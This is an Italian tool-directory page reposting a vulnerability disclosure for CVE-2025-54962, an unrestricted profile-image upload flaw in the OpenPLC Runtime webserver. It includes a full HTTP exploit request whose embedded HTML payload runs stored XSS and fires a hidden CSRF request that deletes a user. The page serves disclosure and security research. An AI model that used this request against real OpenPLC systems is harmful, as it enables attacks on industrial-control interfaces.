Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-54962 — Gli utenti autenticati possono caricare file arbitrari (ad es. .html, .svg) come immagini del profilo in OpenPLC Runtime. Questi file sono accessibili pubblicamente senza autenticazione, consentendo XSS persistente o la distribuzione di contenuti dannosi. | Kitploit
Strumenti/GitHubGitHub/eyodav/cve-2025-54962
Analisi delle VulnerabilitàExploitSicurezza SCADA/ICSSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubeyodav/cve-2025-54962

CVE-2025-54962

Gli utenti autenticati possono caricare file arbitrari (ad es. .html, .svg) come immagini del profilo in OpenPLC Runtime. Questi file sono accessibili pubblicamente senza autenticazione, consentendo XSS persistente o la distribuzione di contenuti dannosi.

Vedi Repository
71 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🔥 CVE-2025-54962 — Upload di file non sicuro nel webserver OpenPLC Runtime

(OpenPLC Runtime ≤ 2024-12-31 — XSS persistente, CSRF)

📌 Riepilogo

Ho scoperto una vulnerabilità nel webserver OpenPLC Runtime (versione rilasciata: 2024-12-31) che consente agli utenti autenticati di caricare file arbitrari (ad es. .html, .svg) come immagini del profilo. Questi file vengono memorizzati nella directory /static/ e sono accessibili senza autenticazione, consentendo scenari di XSS persistente o hosting di contenuti dannosi.


🧪 Componente interessato

  • Route: /edit-user
  • Interessata: funzionalità di upload dei file per le immagini del profilo

⚠️ Impatto

  • Upload arbitrario di file con validazione insufficiente di MIME ed estensione
  • XSS persistente
  • Hosting di contenuti dannosi
  • Accesso non autenticato ai file caricati
  • CSRF

🎯 Vettore di attacco

  1. Un utente autenticato carica un file .html o .svg come immagine del profilo.
  2. Il file viene salvato in /static/ e gli viene assegnato un ID prevedibile (ad es. http://localhost:8080/static/336029.html)
  3. Qualsiasi utente (anche non autenticato) può accedere direttamente al file caricato.
  4. Se il file contiene JavaScript o altro codice dannoso, verrà eseguito nel browser della vittima.

📸 Prova visiva del concetto

Dashboard quando il PLC è in esecuzione

dashboard.png

Caricamento di un file .html dannoso

choose file.png

Utilizzo di "Tutti i file" per aggirare il filtro delle immagini

file.png

File caricato eseguito da /static/

poc.png


🎞️ Video PoC

  • Demo PoC di base
    poc de base.mp4

  • Dimostrazione di accesso non autenticato
    unauthenticated.mp4

  • PoC CSRF
    poc csrf.mp4


📤 Esempio di richiesta di exploit con Burp Suite Repeater

root@kitploit:~
POST /edit-user HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 1397
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: [OpenPLC URL]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryW3GoLRyFS7dyLS2B
User-Agent: [UA]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8080/edit-user?table_id=10
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: session=[cookie]
Connection: close

------WebKitFormBoundaryW3GoLRyFS7dyLS2B
Content-Disposition: form-data; name="user_id"

10
------WebKitFormBoundaryW3GoLRyFS7dyLS2B
Content-Disposition: form-data; name="full_name"

OpenPLC User
------WebKitFormBoundaryW3GoLRyFS7dyLS2B
Content-Disposition: form-data; name="user_name"

openplc
------WebKitFormBoundaryW3GoLRyFS7dyLS2B
Content-Disposition: form-data; name="user_email"

[email protected]
------WebKitFormBoundaryW3GoLRyFS7dyLS2B
Content-Disposition: form-data; name="user_password"

mypasswordishere
------WebKitFormBoundaryW3GoLRyFS7dyLS2B
Content-Disposition: form-data; name="file"; filename="poc cve.html"
Content-Type: text/html

<!DOCTYPE html>
<html>
<head>
  <title>PoC – Unfiltered Upload</title>
</head>
<body>
  <h1>Proof of Concept</h1>

  <p>Payload uploaded on vulnerable endpoint. If filtering is broken, executing script below proves stored XSS.</p>

  <h2>XSS Demo (auto-executed)</h2>
  <script>alert('PoC xss')</script>

  <h2>CSRF</h2>
  <img src="http://127.0.0.1:8080/delete-user?user_id=%5BUser%20ID%5D" style="display:none" />

  <h2>document.domain</h2>
  <p>Opened from: <script>document.write(document.domain)</script></p>

  <h2>Manual link to malicious HTML</h2>
  <a href="https://google.com/" target="_blank">Click to redirect on google.com</a>
</body>
</html>

------WebKitFormBoundaryW3GoLRyFS7dyLS2B--
Scarica lo strumento